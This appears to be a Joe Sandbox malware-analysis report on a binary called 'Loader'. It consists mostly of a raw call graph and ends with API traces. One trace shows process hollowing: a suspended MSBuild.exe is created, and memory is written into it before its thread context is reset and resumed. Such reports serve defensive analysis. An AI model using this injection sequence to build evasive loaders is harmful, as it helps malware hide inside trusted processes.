cdccb0 17610->17667 17613 cdcc90 17611->17613 17615 cd56b7 14 API calls 17613->17615 17615->17617 17616 cdcad8 17618 cdcac4 17616->17618 17671 cdccca 17616->17671 17617->17028 17624 cd56b7 14 API calls 17618->17624 17619 cdcada 17619->17618 17623 cd69f4 14 API calls 17619->17623 17621 cdcab6 17628 cdcabf 17621->17628 17629 cdcad3 17621->17629 17625 cdcae8 17623->17625 17624->17617 17627 cd56b7 14 API calls 17625->17627 17626 cdcb4d 17631 cd56b7 14 API calls 17626->17631 17632 cdcaf3 17627->17632 17633 cd1314 14 API calls 17628->17633 17630 cdccb0 48 API calls 17629->17630 17630->17616 17639 cdcb55 17631->17639 17632->17616 17632->17618 17637 cd69f4 14 API calls 17632->17637 17633->17618 17634 cdcb98 17634->17618 17635 cdc065 32 API calls 17634->17635 17636 cdcbc6 17635->17636 17638 cd56b7 14 API calls 17636->17638 17640 cdcb0f 17637->17640 17643 cdcb82 17638->17643 17639->17643 17675 cdc065 17639->17675 17644 cd56b7 14 API calls 17640->17644 17641 cd56b7 14 API calls 17641->17617 17643->17618 17643->17643 17647 cd69f4 14 API calls 17643->17647 17664 cdcc80 17643->17664 17644->17616 17645 cdcb79 17646 cd56b7 14 API calls 17645->17646 17646->17643 17648 cdcc11 17647->17648 17649 cdcc19 17648->17649 17650 cdcc21 17648->17650 17651 cd56b7 14 API calls 17649->17651 17652 cd532c 29 API calls 17650->17652 17651->17618 17653 cdcc2d 17652->17653 17654 cdcca5 17653->17654 17655 cdcc34 17653->17655 17656 cd1a2c 11 API calls 17654->17656 17684 ce392c 17655->17684 17658 cdccaf 17656->17658 17660 cdcc5b 17663 cd1314 14 API calls 17660->17663 17661 cdcc7a 17662 cd56b7 14 API calls 17661->17662 17662->17664 17665 cdcc60 17663->17665 17664->17641 17666 cd56b7 14 API calls 17665->17666 17666->17618 17668 cdccbd 17667->17668 17669 cdca9f 17667->17669 17699 cdcd1f 17668->17699 17669->17616 17669->17619 17669->17621 17672 cdcb3d 17671->17672 17674 cdcce0 17671->17674 17672->17626 17672->17634 17674->17672 17714 ce383b 17674->17714 17676 cdc08d 17675->17676 17677 cdc072 17675->17677 17678 cdc09c 17676->17678 17814 ce27c4 17676->17814 17677->17676 17679 cdc07e 17677->17679 17821 cdf005 17678->17821 17681 cd1314 14 API calls 17679->17681 17683 cdc083 17681->17683 17683->17645 17833 cd69b5 17684->17833 17689 ce399f 17691 ce39ab 17689->17691 17693 cd56b7 14 API calls 17689->17693 17690 cd69b5 48 API calls 17692 ce397c 17690->17692 17695 cd56b7 14 API calls 17691->17695 17697 cdcc55 17691->17697 17694 ccc8e4 17 API calls 17692->17694 17693->17691 17696 ce3989 17694->17696 17695->17697 17696->17689 17698 ce3993 SetEnvironmentVariableW 17696->17698 17697->17660 17697->17661 17698->17689 17700 cdcd2d 17699->17700 17701 cdcd32 17699->17701 17700->17669 17702 cd69f4 14 API calls 17701->17702 17708 cdcd4f 17702->17708 17703 cdcdbd 17704 cd1f83 48 API calls 17703->17704 17706 cdcdc2 17704->17706 17705 cd56b7 14 API calls 17705->17700 17707 cd1a2c 11 API calls 17706->17707 17709 cdcdce 17707->17709 17708->17703 17708->17706 17710 cd69f4 14 API calls 17708->17710 17711 cd56b7 14 API calls 17708->17711 17712 cd532c 29 API calls 17708->17712 17713 cdcdac 17708->17713 17710->17708 17711->17708 17712->17708 17713->17705 17715 ce384f 17714->17715 17716 ce3849 17714->17716 17732 ce3864 17715->17732 17719 ce40ab 17716->17719 17720 ce4063 17716->17720 17752 ce40c1 17719->17752 17722 ce4069 17720->17722 17723 ce4086 17720->17723 17724 cd1314 14 API calls 17722->17724 17726 cd1314 14 API calls 17723->17726 17731 ce40a4 17723->17731 17725 ce406e 17724->17725 17727 cd19ff 29 API calls 17725->17727 17728 ce4095 17726->17728 17729 ce4079 17727->17729 17730 cd19ff 29 API calls 17728->17730 17729->17674 17730->17729 17731->17674 17733 ccc7ea 48 API calls 17732->17733 17735 ce387a 17733->17735 17734 ce385f 17734->17674 17735->17734 17736 ce3896 17735->17736 17737 ce38ad 17735->17737 17738 cd1314 14 API calls 17736->17738 17740 ce38c8 17737->17740 17741 ce38b6 17737->17741 17739 ce389b 17738->17739 17744 cd19ff 29 API calls 17739->17744 17742 ce38e8 17740->17742 17743 ce38d5 17740->17743 17745 cd1314 14 API calls 17741->17745 17770 ce418c 17742->17770 17746 ce40c1 48 API calls 17743->17746 17744->17734 17748 ce38bb 17745->17748 17746->17734 17750 cd19ff 29 API calls 17748->17750 17750->17734 17751 cd1314 14 API calls 17751->17734 17753 ce40eb 17752->17753 17754 ce40d1 17752->17754 17755 ce410a 17753->17755 17756 ce40f3 17753->17756 17757 cd1314 14 API calls 17754->17757 17759 ce412d 17755->17759 17760 ce4116 17755->17760 17758 cd1314 14 API calls 17756->17758 17761 ce40d6 17757->17761 17762 ce40f8 17758->17762 17767 ccc7ea 48 API calls 17759->17767 17769 ce40e1 17759->17769 17763 cd1314 14 API calls 17760->17763 17764 cd19ff 29 API calls 17761->17764 17765 cd19ff 29 API calls 17762->17765 17766 ce411b 17763->17766 17764->17769 17765->17769 17768 cd19ff 29 API calls 17766->17768 17767->17769 17768->17769 17769->17729 17771 ccc7ea 48 API calls 17770->17771 17772 ce419f 17771->17772 17775 ce41d2 17772->17775 17777 ce4206 17775->17777 17776 cc71d1 5 API calls 17778 ce38fe 17776->17778 17779 ce4286 17777->17779 17780 ce446a 17777->17780 17782 ce4273 GetCPInfo 17777->17782 17787 ce428a 17777->17787 17778->17734 17778->17751 17781 cd573f MultiByteToWideChar 17779->17781 17779->17787 17784 ce430c 17781->17784 17782->17779 17782->17787 17783 ce445e 17785 cc9f07 14 API calls 17783->17785 17784->17783 17786 cd56f1 15 API calls 17784->17786 17784->17787 17788 ce4333 17784->17788 17785->17787 17786->17788 17787->17776 17787->17780 17788->17783 17789 cd573f MultiByteToWideChar 17788->17789 17790 ce437f 17789->17790 17790->17783 17791 cd573f MultiByteToWideChar 17790->17791 17792 ce439b 17791->17792 17792->17783 17793 ce43a9 17792->17793 17794 ce440c 17793->17794 17795 cd56f1 15 API calls 17793->17795 17798 ce43c2 17793->17798 17796 cc9f07 14 API calls 17794->17796 17795->17798 17797 ce4412 17796->17797 17799 cc9f07 14 API calls 17797->17799 17798->17794 17800 cd573f MultiByteToWideChar 17798->17800 17799->17787 17801 ce4405 17800->17801 17801->17794 17802 ce442e 17801->17802 17808 cd6245 17802->17808 17805 cc9f07 14 API calls 17809 cd67ac LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 17808->17809 17810 cd6250 17809->17810 17811 cd6256 17810->17811 17812 cd658f LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 17810->17812 17811->17805 17813 cd6296 CompareStringW 17812->17813 17813->17811 17815 ce27cf 17814->17815 17816 ce27e4 HeapSize 17814->17816 17817 cd1314 14 API calls 17815->17817 17816->17678 17818 ce27d4 17817->17818 17819 cd19ff 29 API calls 17818->17819 17820 ce27df 17819->17820 17820->17678 17822 cdf01d 17821->17822 17823 cdf012 17821->17823 17825 cdf025 17822->17825 17831 cdf02e 17822->17831 17824 cd56f1 15 API calls 17823->17824 17829 cdf01a 17824->17829 17826 cd56b7 14 API calls 17825->17826 17826->17829 17827 cdf058 HeapReAlloc 17827->17829 17827->17831 17828 cdf033 17830 cd1314 14 API calls 17828->17830 17829->17683 17830->17829 17831->17827 17831->17828 17832 ccf4ab 2 API calls 17831->17832 17832->17831 17834 ccc7ea 48 API calls 17833->17834 17835 cd69c7 17834->17835 17837 cd69d9 17835->17837 17841 cd6226 17835->17841 17838 ccc8e4 17837->17838 17847 ccc93c 17838->17847 17844 cd6792 17841->17844 17845 cd670d 5 API calls 17844->17845 17846 cd622e 17845->17846 17846->17837 17848 ccc94a 17847->17848 17849 ccc964 17847->17849 17865 ccc8ca 17848->17865 17851 ccc98a 17849->17851 17852 ccc96b 17849->17852 17854 cd573f MultiByteToWideChar 17851->17854 17853 ccc8fc 17852->17853 17869 ccc88b 17852->17869 17853->17689 17853->17690 17857 ccc999 17854->17857 17856 ccc9a0 GetLastError 17874 cd133a 17856->17874 17857->17856 17858 ccc9c6 17857->17858 17860 ccc88b 15 API calls 17857->17860 17858->17853 17861 cd573f MultiByteToWideChar 17858->17861 17860->17858 17864 ccc9dd 17861->17864 17863 cd1314 14 API calls 17863->17853 17864->17853 17864->17856 17866 ccc8d5 17865->17866 17867 ccc8dd 17865->17867 17868 cd56b7 14 API calls 17866->17868 17867->17853 17868->17867 17870 ccc8ca 14 API calls 17869->17870 17871 ccc899 17870->17871 17879 ccc86c 17871->17879 17882 cd1327 17874->17882 17876 cd1345 17877 cd1314 14 API calls 17876->17877 17878 ccc9ac 17877->17878 17878->17863 17880 cd56f1 15 API calls 17879->17880 17881 ccc879 17880->17881 17881->17853 17883 cd5a9b 14 API calls 17882->17883 17884 cd132c 17883->17884 17884->17876 17888 cc2010 GetModuleHandleA GetModuleFileNameW 17885->17888 17895 cd401a 17888->17895 17890 cc2081 17899 cc1f00 17890->17899 17893 cc71d1 5 API calls 17894 cc2099 17893->17894 17894->16895 17896 cd402d 17895->17896 17908 cd408f 17896->17908 17898 cd403f 17898->17890 17950 cc1ba0 GetPEB 17899->17950 17901 cc1f1f 17951 cc1c10 GetProcAddress 17901->17951 17903 cc1f39 17904 cc71d1 5 API calls 17903->17904 17905 cc1ffb 17904->17905 17905->17893 17907 cc1f31 17907->17903 17964 cc1db0 17907->17964 17909 cd40bf 17908->17909 17910 cd40ec 17909->17910 17911 cd40ce 17909->17911 17922 cd40c3 17909->17922 17913 cd40f9 17910->17913 17932 ccd5c0 17910->17932 17912 cd1ba8 29 API calls 17911->17912 17912->17922 17916 cd4131 17913->17916 17917 cd4113 17913->17917 17914 cc71d1 5 API calls 17918 cd4334 17914->17918 17920 cd4145 17916->17920 17921 cd42c1 17916->17921 17938 cdf46b 17917->17938 17918->17898 17920->17922 17924 cd41df 17920->17924 17928 cd4189 17920->17928 17921->17922 17923 cd5801 WideCharToMultiByte 17921->17923 17922->17914 17923->17922 17925 cd5801 WideCharToMultiByte 17924->17925 17926 cd41f2 17925->17926 17926->17922 17929 cd420b GetLastError 17926->17929 17927 cd5801 WideCharToMultiByte 17927->17922 17928->17927 17929->17922 17930 cd421a 17929->17930 17930->17922 17931 cd5801 WideCharToMultiByte 17930->17931 17931->17930 17933 ccd5d0 17932->17933 17942 cd5f88 17933->17942 17941 cdf4a2 17938->17941 17939 cc71d1 5 API calls 17940 cdf578 17939->17940 17940->17922 17941->17939 17943 ccd5ed 17942->17943 17944 cd5f9f 17942->17944 17946 cd5fb9 17943->17946 17944->17943 17945 cda055 48 API calls 17944->17945 17945->17943 17947 cd5fd0 17946->17947 17949 ccd5fa 17946->17949 17948 cd7242 48 API calls 17947->17948 17947->17949 17948->17949 17949->17913 17950->17901 17952 cc1c59 CreateFileA 17951->17952 17953 cc1caa 17952->17953 17954 cc1cb3 GetFileSize 17952->17954 17957 cc71d1 5 API calls 17953->17957 17955 cc1cd9 CloseHandle 17954->17955 17956 cc1cf1 17954->17956 17955->17953 17959 cc1cfc ReadFile 17956->17959 17958 cc1d98 17957->17958 17958->17907 17960 cc1d3c 17959->17960 17961 cc1d70 CloseHandle 17959->17961 17962 cc1d4d 17960->17962 17963 cc1d58 CloseHandle 17960->17963 17961->17953 17962->17963 17963->17953 17976 cc1000 17964->17976 17967 cc1000 115 API calls 17968 cc1e5b GetProcAddress 17967->17968 17969 cc1e84 VirtualProtect 17968->17969 17971 cc1edc 17969->17971 17972 cc1ed1 17969->17972 17974 cc71d1 5 API calls 17971->17974 17987 cc1bd0 17972->17987 17975 cc1eeb 17974->17975 17975->17903 17977 cc1056 17976->17977 17991 cc1440 17977->17991 17979 cc13c7 18020 cc1b80 17979->18020 17984 cc1167 17984->17979 17986 cd2a5e 14 API calls 17984->17986 17995 cc1490 17984->17995 17998 cc14c0 17984->17998 18014 cc1af0 17984->18014 17986->17984 17988 cc1bfa 17987->17988 17989 cc71d1 5 API calls 17988->17989 17990 cc1c04 17989->17990 17990->17971 17992 cc1466 17991->17992 17993 cc71d1 5 API calls 17992->17993 17994 cc1487 17993->17994 17994->17984 18023 cc2410 17995->18023 17997 cc14aa 17997->17984 18000 cc1510 17998->18000 18070 cc3090 18000->18070 18001 cc15b1 18009 cc15c4 18001->18009 18074 cc31c0 18001->18074 18096 cc35f0 18009->18096 18015 cc1b20 18014->18015 18266 cc2130 18015->18266 18018 cc71d1 5 API calls 18019 cc1b4e 18018->18019 18019->17984 18285 cc2230 18020->18285 18024 cc243f 18023->18024 18025 cc2458 18023->18025 18024->17997 18027 cc24f0 18025->18027 18028 cc2533 18027->18028 18046 cc27a0 18028->18046 18031 cc258a 18050 cc2820 18031->18050 18047 cc27bb 18046->18047 18048 cc71d1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18047->18048 18049 cc2578 18048->18049 18049->18031 18061 cc2800 18049->18061 18051 cc2837 18050->18051 18052 cc27a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18051->18052 18053 cc25a1 18052->18053 18054 cc28a0 18053->18054 18055 cc2af0 30 API calls 18054->18055 18056 cc28ba 18055->18056 18062 cc7974 30 API calls 18061->18062 18063 cc2812 18062->18063 18071 cc30d9 18070->18071 18073 cc30f1 18071->18073 18104 cc3720 18071->18104 18073->18001 18112 cc74e4 18074->18112 18078 cc3217 18090 cc3255 18078->18090 18133 cc3ac0 18078->18133 18126 cc7515 18090->18126 18097 cc3615 18096->18097 18247 cc4de0 18097->18247 18100 cc3640 18101 cc3654 18100->18101 18105 cc3762 18104->18105 18106 cc3815 18105->18106 18107 cc3090 39 API calls 18105->18107 18106->18073 18109 cc377d 18107->18109 18108 cc3640 39 API calls 18108->18106 18110 cc35f0 39 API calls 18109->18110 18111 cc3790 18109->18111 18110->18111 18111->18108 18113 cc74fa 18112->18113 18114 cc74f3 18112->18114 18116 cc3202 18113->18116 18165 cc9c58 EnterCriticalSection 18113->18165 18160 cd1d3f 18114->18160 18118 cc3990 18116->18118 18119 cc39ee 18118->18119 18120 cc39b2 18118->18120 18121 cc71d1 5 API calls 18119->18121 18122 cc74e4 7 API calls 18120->18122 18123 cc3a00 18121->18123 18124 cc39c3 18122->18124 18123->18078 18125 cc7515 2 API calls 18124->18125 18125->18119 18161 cd660b LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 18160->18161 18162 cd1d44 18161->18162 18163 cd1d11 EnterCriticalSection 18162->18163 18164 cd1d4b 18163->18164 18164->18116 18165->18116 18250 cc4e30 18247->18250 18251 cc4f1c 18250->18251 18252 cc4e74 18250->18252 18253 cc71d1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18251->18253 18255 cca45c RaiseException 18252->18255 18256 cc4e94 18252->18256 18254 cc18d9 18253->18254 18254->18100 18255->18256 18257 cc4f30 38 API calls 18256->18257 18258 cc4eef 18257->18258 18259 cc4f70 30 API calls 18258->18259 18260 cc4f04 18259->18260 18267 cc2159 18266->18267 18270 ccd388 18267->18270 18269 cc1b3b 18269->18018 18271 ccd39c 18270->18271 18272 ccd3be 18271->18272 18274 ccd3e5 18271->18274 18273 cd1ba8 29 API calls 18272->18273 18275 ccd3d9 18273->18275 18277 cceb3d 18274->18277 18275->18269 18278 cceb49 18277->18278 18279 ccd13f EnterCriticalSection 18278->18279 18280 cceb57 18279->18280 18281 cce512 79 API calls 18280->18281 18282 cceb64 18281->18282 18283 cceb8c LeaveCriticalSection 18282->18283 18284 cceb75 18283->18284 18284->18275 18286 cc2244 18285->18286 18288 cc13d2 18286->18288 18289 cc2320 18286->18289 18288->17967 18292 cc2350 18289->18292 18291 cc2344 18291->18288 18293 cc2369 18292->18293 18295 cc237b 18292->18295 18294 cc23a0 29 API calls 18293->18294 18294->18295 18295->18291 18297 ccd0bd 18296->18297 18300 ccd0cf 18296->18300 18298 ccd0cb 18297->18298 18301 cd217a 18297->18301 18298->16913 18300->16913 18304 cd22a5 18301->18304 18307 cd237e 18304->18307 18308 cd238a 18307->18308 18315 cd1d11 EnterCriticalSection 18308->18315 18310 cd2400 18324 cd241e 18310->18324 18314 cd2394 18314->18310 18316 cd22f2 18314->18316 18315->18314 18317 cd22fe 18316->18317 18327 ccd13f EnterCriticalSection 18317->18327 18440 cd1d28 LeaveCriticalSection 18324->18440 18326 cd2181 18326->18298 18440->18326 19689 cc8a60 19690 cc8a97 19689->19690 19691 cc8a82 19689->19691 19695 cc8bf5 19691->19695 19698 cc8c61 19695->19698 19699 cc8c10 19695->19699 19696 cc71d1 5 API calls 19697 cc8a87 19696->19697 19697->19690 19701 cd2a79 19697->19701 19698->19696 19699->19698 19700 cd2ab4 78 API calls 19699->19700 19700->19698 19702 cd2a99 19701->19702 19703 cd2a84 19701->19703 19702->19703 19705 cd2aa0 19702->19705 19704 cd1314 14 API calls 19703->19704 19706 cd2a89 19704->19706 19711 cd13c4 19705->19711 19708 cd19ff 29 API calls 19706->19708 19710 cd2a94 19708->19710 19709 cd2aaf 19709->19690 19710->19690 19712 cd13d7 19711->19712 19715 cd163d 19712->19715 19714 cd13ec 19714->19709 19718 cd1649 19715->19718 19716 cd164f 19717 cd1ba8 29 API calls 19716->19717 19719 cd166a 19717->19719 19718->19716 19720 cd1692 19718->19720 19719->19714 19726 ccd13f EnterCriticalSection 19720->19726 19722 cd169e 19727 cd1551 19722->19727 19724 cd16b4 19738 cd16dd 19724->19738 19726->19722 19728 cd1564 19727->19728 19729 cd1577 19727->19729 19728->19724 19741 cd1478 19729->19741 19731 cd159a 19732 cd15b5 19731->19732 19737 cd1628 19731->19737 19745 cdc36c 19731->19745 19734 cd21e8 73 API calls 19732->19734 19735 cd15c8 19734->19735 19759 cdc152 19735->19759 19737->19724 19810 ccd153 LeaveCriticalSection 19738->19810 19740 cd16e5 19740->19719 19742 cd14e1 19741->19742 19743 cd1489 19741->19743 19742->19731 19743->19742 19762 cdc112 19743->19762 19746 cdc73e 19745->19746 19747 cdc74d 19746->19747 19748 cdc775 19746->19748 19749 cd1ba8 29 API calls 19747->19749 19750 cd8e44 29 API calls 19748->19750 19756 cdc768 19749->19756 19751 cdc77e 19750->19751 19772 cdc170 19751->19772 19754 cdc828 19775 cdc3c8 19754->19775 19756->19732 19757 cdc83f 19757->19756 19787 cdc573 19757->19787 19760 cdc2b3 31 API calls 19759->19760 19761 cdc16b 19760->19761 19761->19737 19763 cdc126 19762->19763 19766 cdc2b3 19763->19766 19765 cdc13b 19765->19742 19767 cdcdcf 29 API calls 19766->19767 19768 cdc2c5 19767->19768 19769 cdc2e1 SetFilePointerEx 19768->19769 19771 cdc2cd 19768->19771 19770 cdc2f9 GetLastError 19769->19770 19769->19771 19770->19771 19771->19765 19794 cdc18e 19772->19794 19776 cdc3d7 19775->19776 19777 cd8e44 29 API calls 19776->19777 19779 cdc3f3 19777->19779 19778 cc71d1 5 API calls 19780 cdc571 19778->19780 19781 cdc170 33 API calls 19779->19781 19786 cdc3ff 19779->19786 19780->19756 19782 cdc453 19781->19782 19783 cdc485 ReadFile 19782->19783 19782->19786 19784 cdc4ac 19783->19784 19783->19786 19785 cdc170 33 API calls 19784->19785 19785->19786 19786->19778 19788 cd8e44 29 API calls 19787->19788 19789 cdc586 19788->19789 19790 cdc170 33 API calls 19789->19790 19792 cdc5d0 19789->19792 19791 cdc62d 19790->19791 19791->19792 19793 cdc170 33 API calls 19791->19793 19792->19756 19793->19792 19795 cdc19a 19794->19795 19796 cdc1dd 19795->19796 19797 cdc223 19795->19797 19804 cdc189 19795->19804 19798 cd1ba8 29 API calls 19796->19798 19805 cdd018 EnterCriticalSection 19797->19805 19798->19804 19800 cdc229 19801 cdc24a 19800->19801 19802 cdc2b3 31 API calls 19800->19802 19806 cdc2ab 19801->19806 19802->19801 19804->19754 19804->19756 19804->19757 19805->19800 19809 cdd03b LeaveCriticalSection 19806->19809 19808 cdc2b1 19808->19804 19809->19808 19810->19740 20016 cd7600 20019 cd1d28 LeaveCriticalSection 20016->20019 20018 cd7607 20019->20018

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00CF0110,00CF0100), ref: 00CF0334
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CF0347
                                                                                                                • Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 00CF0365
                                                                                                                • ReadProcessMemory.KERNELBASE(0000009C,?,00CF0154,00000004,00000000), ref: 00CF0389
                                                                                                                • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00CF03B4
                                                                                                                • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00CF040C
                                                                                                                • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00CF0457
                                                                                                                • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00CF0495
                                                                                                                • Wow64SetThreadContext.KERNEL32(000000A0,008D0000), ref: 00CF04D1
                                                                                                                • ResumeThread.KERNELBASE(000000A0), ref: 00CF04E0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                • API String ID: 2687962208-3857624555
                                                                                                                • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                • Instruction ID: 8a7c6285216a724a6d70ce2ad864feaf862a09251a96c88b98aa60e6954cc71b
                                                                                                                • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                • Instruction Fuzzy Hash: FCB10B7664064AAFDB60CF58CC80BEA73A5FF88714F158114EA1CAB342D774FA51CB94

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AddressCloseCreateHandleProcSize
                                                                                                                • String ID: CreateFileA
                                                                                                                • API String ID: 2547132502-1429953656
                                                                                                                • Opcode ID: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
                                                                                                                • Instruction ID: 07df4c49a6e64b5a2eed55e6ba22de401b5ac359ba41a96432ac09578365c069
                                                                                                                • Opcode Fuzzy Hash: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
                                                                                                                • Instruction Fuzzy Hash: 7941A4B0D082499FDB00EFA9D4987AEBBF0EF49314F04852DE899AB391D7749544CF92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 42 cd6642-cd664e 43 cd66e0-cd66e3 42->43 44 cd66e9 43->44 45 cd6653-cd6664 43->45 46 cd66eb-cd66ef 44->46 47 cd6666-cd6669 45->47 48 cd6671-cd668a LoadLibraryExW 45->48 49 cd666f 47->49 50 cd6709-cd670b 47->50 51 cd668c-cd6695 GetLastError 48->51 52 cd66f0-cd6700 48->52 54 cd66dd 49->54 50->46 55 cd66ce-cd66db 51->55 56 cd6697-cd66a9 call cd9d04 51->56 52->50 53 cd6702-cd6703 FreeLibrary 52->53 53->50 54->43 55->54 56->55 59 cd66ab-cd66bd call cd9d04 56->59 59->55 62 cd66bf-cd66cc LoadLibraryExW 59->62 62->52 62->55
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,F876D5F9,?,00CD6751,00000000,00000000,00000000,00000000), ref: 00CD6703
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                • Opcode ID: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
                                                                                                                • Instruction ID: b37d2abffe13f457b8cd396503f340c7f74600be9d9c66a2057b3f55231d799e
                                                                                                                • Opcode Fuzzy Hash: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
                                                                                                                • Instruction Fuzzy Hash: 8E210D36A01214A7C7319B66DC45B5E37B8DB417B4F150122FF15A7391EB30EE01D6E0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressConsoleFreeHandleModuleProc
                                                                                                                • String ID: FreeConsole$kernel32.dll
                                                                                                                • API String ID: 1635486814-2564406000
                                                                                                                • Opcode ID: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
                                                                                                                • Instruction ID: 31b758787dead4bbb77bf84c1d3ab0062769d49b75bff57ce21389132b9ea46d
                                                                                                                • Opcode Fuzzy Hash: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
                                                                                                                • Instruction Fuzzy Hash: 990166749042489FCB40EFB8D98579DBBF4AB48300F41856AE849DB351EB34A654DF82

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
